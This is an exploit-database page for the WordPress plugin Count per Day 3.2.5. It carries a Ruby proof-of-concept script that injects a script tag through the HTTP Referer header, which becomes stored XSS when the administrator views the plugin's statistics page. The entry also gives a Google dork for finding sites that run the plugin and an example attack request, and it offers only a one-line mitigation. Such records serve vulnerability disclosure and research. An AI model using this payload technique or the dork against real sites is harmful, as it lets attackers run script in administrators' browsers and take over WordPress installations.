header-logo
Suggest Exploit
vendor:
Count per Day
by:
m3tamantra
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Count per Day
Affected Version From: 3.2.5
Affected Version To: 3.2.5
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:count_per_day:3.2.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
2013

WordPress Count per Day 3.2.5 CSRF

Count per Day is a WordPress plugin that allows users to track the number of visitors to their website. The plugin is vulnerable to CSRF due to the lack of a CSRF token in the counter.php file. An attacker can craft a malicious request to the counter.php file with a malicious referer, which will be stored in the database. When the admin views the Count per Day - Statistics page, the malicious JavaScript payload will be executed.

Mitigation:

Implement CSRF tokens in the counter.php file.
Source

Exploit-DB raw data:

#!/usr/bin/ruby
# Exploit Title: WordPress Count per Day 3.2.5 CSRF
# Google Dork: inurl:"/wp-content/plugins/count-per-day
# Date: 18.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/count-per-day/
# Software Link: http://downloads.wordpress.org/plugin/count-per-day.3.2.5.zip
# Version: 3.2.5
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
# 
#
# Because this is my first Vulnerability I ever found by my self, I wrote a PoC script
# I know that this is overkill and the Vulnerability is trivial to exploit :P
# The JavaScript Payload is executed when the Admin views Count per Day - Statistics
#
# Note: Like the name says "Count per Day" will only count an Visitor one time per Day per Page
#  $date = date_i18n('Y-m-d');
#  // new visitor on page?
#  $count = $this->mysqlQuery('var', $wpdb->prepare("SELECT COUNT(*) FROM $wpdb->cpd_counter WHERE ip=$this->aton(%s) AND date=%s AND page=%d", $userip, $date, $page), 'count check '.__LINE__);
#
##########################################
### counter.php (Vulnerable Code part) ###
###############################################################################################################
#  120         $referer = ($this->options['referers'] && isset($_SERVER['HTTP_REFERER'])) ? $_SERVER['HTTP_REFERER'] : '';
#  ...
#  ...
#  139                 $this->mysqlQuery('', $wpdb->prepare("INSERT INTO $wpdb->cpd_counter (page, ip, client, date, referer)
#  140                 VALUES (%s, $this->aton(%s), %s, %s, %s)", $page, $userip, $client, $date, $referer), 'count insert '.__LINE__);
################################################################################################################
#
### Example Request ############################################################################
# GET /wordpress/ HTTP/1.1
# Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
# Accept: */*
# User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
# Referer: https://boards.4chan.org/b/<script>alert(666)</script>
# Connection: close
# Host: 127.0.0.1:9001
################################################################################################

require "net/http"
require "uri"

if(ARGV.length == 1)
    uri = URI.parse(ARGV[0])
    http = Net::HTTP.new(uri.host, uri.port)
    #http.set_debug_output($stderr)
    request = Net::HTTP::Get.new(uri.request_uri)
    request["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0"
    request["Referer"] = "https://boards.4chan.org/b/<script>alert(666)</script>"
    http.request(request)
    puts "Have a nice day :-)"
else
    puts "Usage:\t\truby #{__FILE__} [WordPress URL]"
    puts "Example:\truby #{__FILE__} http://127.0.0.1/wordpress/?p=1\n"
end

Navigation

Suggest Exploit

Services By CQR